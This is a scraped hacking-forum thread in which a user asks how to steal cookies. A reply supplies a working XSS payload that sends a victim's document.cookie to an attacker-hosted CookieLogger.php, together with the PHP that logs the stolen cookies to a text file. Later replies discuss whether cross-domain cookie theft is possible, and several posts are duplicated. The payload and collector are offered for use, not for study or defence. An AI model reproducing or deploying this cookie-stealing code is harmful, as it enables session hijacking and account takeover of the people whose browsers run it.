PHP sniffer 03-28-2013, 06:28 PM
#1
Is there way to create PHP sniffer to steal cookies ??
| PHP sniffer filter_list | |
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
RE: PHP sniffer 03-28-2013, 06:42 PM
#2
Once you find a site vulnerable for XSS, and upload your cookie catcher script(which I've given, look down) in your web hosting account, submit this javascript in the vulnerable field :
Now, the CookieLogger.php should be :
The cookies get stored in a file named cookies.txt in the same directory where CookieLogger.php is uploaded.
What you're doing is, you get the cookies using the javascript and with the PHP code, you store them in a .txt file.
I hope this helps.
Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>PHP Code:
<?php
if(isset($_GET['cookie']))
{
$handler = fopen("cookies.txt","a");
fwrite($handler, $_GET['cookie']);
fclose($handler);
}
?>The cookies get stored in a file named cookies.txt in the same directory where CookieLogger.php is uploaded.
What you're doing is, you get the cookies using the javascript and with the PHP code, you store them in a .txt file.
I hope this helps.
![[Image: 2YpkRjy.png]](http://i.imgur.com/2YpkRjy.png)
RE: PHP sniffer 03-28-2013, 06:50 PM
#3
Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookies
btw. thank you !
btw. thank you !
RE: PHP sniffer 03-28-2013, 06:50 PM
#4
Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookies
btw. thank you !
btw. thank you !
RE: PHP sniffer 03-29-2013, 03:02 AM
#5
As far as I know, you can't. Cookies are only available to the domain they are set to. So technically, you can set a cookie to be available to a completely different domain, but, why the hell would you 
Feel free to look at: http://php.net/manual/en/features.cookies.php for more information on how PHP handles cookies
Feel free to look at: http://php.net/manual/en/features.cookies.php for more information on how PHP handles cookies
Staff will never ever ask you for your personal information.
We know everything about you anyway.
We know everything about you anyway.
RE: PHP sniffer 03-29-2013, 03:02 AM
#6
As far as I know, you can't. Cookies are only available to the domain they are set to. So technically, you can set a cookie to be available to a completely different domain, but, why the hell would you
Feel free to look at: http://php.net/manual/en/features.cookies.php for more information on how PHP handles cookies
Feel free to look at: http://php.net/manual/en/features.cookies.php for more information on how PHP handles cookies
Staff will never ever ask you for your personal information.
We know everything about you anyway.
We know everything about you anyway.
RE: PHP sniffer 03-29-2013, 09:48 AM
#7
(03-28-2013, 06:50 PM)fckN Wrote: Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookiesOh. As far as I know, thats not possible.
btw. thank you !
In my post above, you see, we get the cookies from that particular server in which we execute the javascript. Otherwise why would we do that?
Suppose you make a PHP code to steal cookies(assume), you wont be able to execute it in that particular slave server and PHP is server sided.
So, I guess its not possible.
RE: PHP sniffer 03-29-2013, 09:48 AM
#8
(03-28-2013, 06:50 PM)fckN Wrote: Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookiesOh. As far as I know, thats not possible.
btw. thank you !
In my post above, you see, we get the cookies from that particular server in which we execute the javascript. Otherwise why would we do that?
Suppose you make a PHP code to steal cookies(assume), you wont be able to execute it in that particular slave server and PHP is server sided.
So, I guess its not possible.
Users browsing this thread: 1 Guest(s)